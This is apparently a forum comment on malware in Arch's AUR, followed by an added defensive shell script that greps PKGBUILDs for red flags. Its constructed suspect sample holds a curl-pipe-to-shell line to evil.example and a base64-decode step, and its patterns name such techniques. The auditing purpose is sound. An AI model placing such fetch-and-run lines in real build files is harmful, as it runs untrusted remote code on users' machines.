Agreed. There have been cases of malware sneaking its way into the AUR.
Now it could be avoided by checking PKGBUILDs, and I can trust that the reader is checking those (are you, reader? 🤨). But do you have that trust for every user?
I prefer Void Linux’s way of handling packages, where it all goes through one ultimately trusted git repo that gets packaged up if the license allows it, otherwise using xbps-src. If it were a bit less DIY compared to Arch I’d be hopping onto it tbh.
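As an added example (not part of the comment above, and not an AUR or Arch tool), here is a small shell triage that a practitioner could run over a downloaded PKGBUILD before `makepkg`. It greps for the red flags that have shown up in past AUR incidents: `SKIP` checksums, plain-http sources, curl-pipe-to-shell, base64/eval obfuscation, and installs to absolute paths instead of `$pkgdir`. The two sample PKGBUILDs, their package names and the URLs in them are constructed for the demo; the pattern list is a heuristic starting point, not a substitute for reading the whole file.

```shell
#!/bin/sh
# Added example: static triage of a PKGBUILD before building it.
# Heuristic only; every hit is a "read this part carefully", not a verdict.

# audit_pkgbuild FILE
#   Prints one line per finding. Always returns 0 so it can be used with set -e.
audit_pkgbuild() {
    f="$1"
    grep -q "'SKIP'" "$f" && \
        echo "$f: checksum set to SKIP (source not integrity-checked; only acceptable for git sources pinned to a commit)"
    grep -Eq '(http|ftp)://' "$f" && \
        echo "$f: source fetched over plain http/ftp (tamperable in transit)"
    grep -Eq '(curl|wget)[^|]*\|[[:space:]]*(sh|bash)' "$f" && \
        echo "$f: downloads and pipes to a shell at build time"
    grep -Eq 'base64 (-d|--decode)|(^|[[:space:]])eval[[:space:]]' "$f" && \
        echo "$f: decodes or evals data (possible obfuscated payload)"
    grep -Eq '(install|cp|mv)[[:space:]].*[[:space:]]/(usr|etc|home|root|var)/' "$f" && \
        echo "$f: writes to an absolute path instead of \$pkgdir (touches the build host, not the package)"
    return 0
}

# pkgbuild_finding_count FILE -> number of findings on stdout
pkgbuild_finding_count() {
    audit_pkgbuild "$1" | wc -l | tr -d ' '
}

# Constructed sample PKGBUILDs (hypothetical packages and hosts) for the demo.
tmp=$(mktemp -d)
trap 'rm -rf "$tmp"' EXIT

PKGBUILD_CLEAN="$tmp/PKGBUILD.clean"
cat > "$PKGBUILD_CLEAN" <<'EOF'
pkgname=hello
pkgver=1.0
pkgrel=1
arch=('x86_64')
source=("https://example.org/hello-$pkgver.tar.gz")
sha256sums=('0000000000000000000000000000000000000000000000000000000000000000')
package() {
  install -Dm755 "$srcdir/hello" "$pkgdir/usr/bin/hello"
}
EOF

PKGBUILD_SUSPECT="$tmp/PKGBUILD.suspect"
cat > "$PKGBUILD_SUSPECT" <<'EOF'
pkgname=totally-legit
pkgver=2.3
pkgrel=1
arch=('any')
source=("http://evil.example/legit-$pkgver.tar.gz" "git+https://example.org/helper.git")
sha256sums=('SKIP' 'SKIP')
build() {
  curl -s http://evil.example/setup.sh | sh
}
package() {
  echo 'cHdu' | base64 -d > /tmp/x
  install -Dm755 "$srcdir/legit" /usr/bin/legit
}
EOF

# Usage: run it over both samples; the clean one prints nothing.
audit_pkgbuild "$PKGBUILD_CLEAN"
audit_pkgbuild "$PKGBUILD_SUSPECT"
```

In practice you would point `audit_pkgbuild` at the PKGBUILD from `git clone https://aur.archlinux.org/<pkg>.git` and, on any update, also diff it against the previous revision; the checks above are deliberately simple greps so they can be extended with whatever the next incident teaches.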
Mixed bag